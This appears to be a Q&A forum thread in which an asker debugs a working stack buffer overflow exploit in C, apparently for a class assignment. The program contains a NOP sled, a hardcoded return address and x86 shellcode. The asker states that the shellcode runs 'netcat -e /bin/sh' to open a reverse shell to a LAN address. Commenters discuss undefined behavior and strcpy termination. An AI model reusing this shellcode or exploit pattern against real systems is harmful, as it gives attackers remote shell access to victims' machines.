# Buffer Overflow worked. But when I added a statement, I got the segmentation fault

Tags: c, buffer-overflow

This is my code

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>


int bar(char *arg, char *out)
{
  strcpy(out, arg);
  return 0;
}

void foo(char *argv)
{
  char buf[256];
  bar(argv, buf);
}


int main()
{
    static const char shellcode[] = 
    "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x25\x88\x46\x2a"
    "\x89\x76\x2b\x8d\x5e\x0c\x89\x5e\x2f\x8d\x5e\x0f\x89\x5e\x33\x8d\x5e\x17\x89\x5e"
    "\x37\x8d\x5e\x26\x89\x5e\x3b\x89\x46\x3f\xb0\x0b\x89\xf3\x8d\x4e\x2b\x8d\x56\x3f"
    "\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d"
    "\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x39\x32\x2e\x31\x36\x38\x2e\x37\x32"
    "\x2e\x31\x33\x38\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43"
    "\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46";
    //134byte

    char payload[264];
    memset(payload,'\x90',126);
    memcpy(payload + 126,shellcode,134);
    memcpy(payload + 260,"\xae\xf1\xff\xbf",4);

    foo(payload);
    
    return 0;
}
```

I used gdb and got the right address to make the attack successful.

But when I added `printf("address of payload : %p \n", payload );` below the declaration of payload[],the attack failed. And I get the segmentation fault. The address is same in gdb:

```
gdb-peda$ find 0x315e3ceb
Searching for '0x315e3ceb' in: None ranges
Found 4 results, display max 4 items:
  test6 : 0x8048660 --> 0x315e3ceb 
  test6 : 0x8049660 --> 0x315e3ceb 
[stack] : 0xbffff1ae --> 0x315e3ceb 
[stack] : 0xbffff2d6 --> 0x315e3ceb
```

I don't know what happend after I added the`printf("address of payload : %p \n", payload );`.

Comment: Well, you are trying to exploit UndefinedBehavior, and that is... Undefined. You'll have to dig into the ASM output of your compiler if you want to find out what exactly it did.

Comment: Also, it is quite possible that the version without `printf` was just optimized to do nothing at all, so that no buffer overflow occurred. The code you show has no observable sideeffects, and might be reduced to a NOOP.

Comment: If you're using `strcpy`, then you must ensure that there's a terminating null character `'\0'` at the end of your data, which you aren't doing.  So it's copying more than 264 bytes.  Change `payload` to 265 bytes, and add a null byte to the end.  And you also need to fix the size of `buf` in `foo`, which is only 256 bytes.  No wonder you're getting a seg fault.  Also, keep in mind that if you use `strcpy`, it will stop copying after the fist null byte it encounters.  It might be better to use `memcpy` rather than `strcpy`.

Comment: Since the behavior of your code depends on values outside of your declared array, it's not surprising that seemingly unrelated changes affect the observed behavior.

Comment: @Hulk I do not get your point. Buffer overflow occured in the version without `printf`. As for the version with  `printf`, the problem is there is segmentation fault. The function of shellcode is equal to `
netcat -e /bin/sh 192.168.72.138 9999`, which has defined behavior. I think the logic is right. I wanna know the exact meaning of yours. Thanks.

Comment: Besides, "exploiting" programs where you already have the C source code is pointless practice. If you have the source, simply re-write it and compile, no need to "exploit" anything.

Comment: @TomKarzes It doesn't matter when using strcpy without a null character. My goal is to execute the shellcode. Although it may copy more than 264 bytes, it dose not affect the function of the shellcode if the INSR point to the shellcode.

Comment: @Lundin This is the assignment from my teacher. I have to fix it.

Comment: @James But it's writing beyond the bounds of the destination array, so you're clobbering the stack.  The function may not be able to return as a result, or if it does, the caller will probably be in a messed-up state.  You have no idea how many byes it will try to copy, except that it's at least 265.  And the destination only has room for 256.  You are writing past the array bounds by at least 9 bytes, and quite possibly a lot more.

Comment: @James so you observed your shellcode actually executing in the first version? What I meant was - the compiler is not required to actually produce any instructions at all for a program that does not have any observable effects (and the results of UB don't count as observable). Whether it does depends on a lot of things - optimization/debug flags, whether it is smart enough to prove that there are no side effects, etc. You need to know your compiler and your platform (calling conventions, stack layout) very well to understand what exectly is going on on that level.